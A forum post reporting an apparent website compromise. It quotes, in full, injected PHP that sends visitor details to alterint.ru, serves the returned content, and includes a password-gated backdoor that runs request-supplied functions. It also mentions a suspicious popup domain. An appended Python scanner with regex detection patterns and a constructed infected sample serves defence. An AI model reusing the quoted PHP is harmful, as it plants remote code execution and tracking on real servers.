Wrathe
Breaking this off of the redirect thread as that had an older date and want to make sure this gets read:
Upon hitting the main site, I receive:
if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget;
When clicking forums, I receive a blank window popup w/ the following URL:
http:// googleframe.net/tijaq.cgi?19
More on that URL, seems based off of Petersburg, Federation of Russia.
Has been in existence for 4 weeks, and the one time I got it to load it was selling anti-hacking software. Now it's just blank loading w/ an SRC link to adultfriendfinder . com.
As Blue would say, "Suspicioussssss!"
On further note, that googleframe URL, if you visit its https version, you get a BS cert registered to: googleleadservices.cn
That particular URL Google flags as a harmful site and shuts down traversal to w/ a giant warning.
Hold me, I'm scared!
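A defensive scan for the traits visible in the PHP quoted in the post above, added here as an example that is not part of the original post: it flags a request parameter being called as a function, a cookie reflected through die(), and outbound fetches over HTTP or raw sockets. The rule names, the triage thresholds and both sample inputs are constructed assumptions.

```python
import re

# Heuristic rules modelled on traits of the injected snippet quoted above.
RULES = {
    # $_REQUEST["f"](...) : a request parameter used as a callable
    "request-controlled-call": re.compile(
        r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]+\]\s*\("),
    # die($_COOKIE[...]) : cookie value reflected straight to the response
    "cookie-reflected-by-die": re.compile(
        r"\b(?:die|exit)\s*\(\s*\$_COOKIE\b"),
    # file_get_contents("http://...") or curl_init("http://...")
    "remote-fetch-http": re.compile(
        r"\b(?:file_get_contents|curl_init)\s*\(\s*[\"']https?://", re.I),
    # fsockopen(...) used as a fallback fetch path
    "raw-socket-fetch": re.compile(r"\bfsockopen\s*\(", re.I),
}

def scan_php(source):
    """Return sorted (rule_name, line_number) pairs for every rule hit."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return sorted(hits, key=lambda h: (h[1], h[0]))

def triage(hits):
    """'backdoor' if a request-controlled call is present, 'suspicious'
    if two or more other rules fire, otherwise 'clean'."""
    names = {name for name, _ in hits}
    if "request-controlled-call" in names:
        return "backdoor"
    return "suspicious" if len(names) >= 2 else "clean"

# Constructed sample with the same shape as the quoted snippet (not a real file).
SAMPLE_INFECTED = '''<?php
if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
$indget = file_get_contents("http://" . $domain . $url);
$fp = fsockopen($domain, 80, $errno, $errstr, 30);
if (@$_REQUEST["p"] == "CONSTRUCTED") $_REQUEST["f"](stripslashes($_REQUEST["c"]));
echo $indget;
'''
# Constructed benign sample: reads a request value but never calls it.
SAMPLE_CLEAN = '<?php $name = htmlspecialchars($_GET["name"]); echo "Hello " . $name;'

if __name__ == "__main__":
    for rule, lineno in scan_php(SAMPLE_INFECTED):
        print(f"line {lineno}: {rule}")
    print("verdict:", triage(scan_php(SAMPLE_INFECTED)))
```

Run over every .php file in the web root, a "backdoor" verdict marks the files to compare against a known-good copy first.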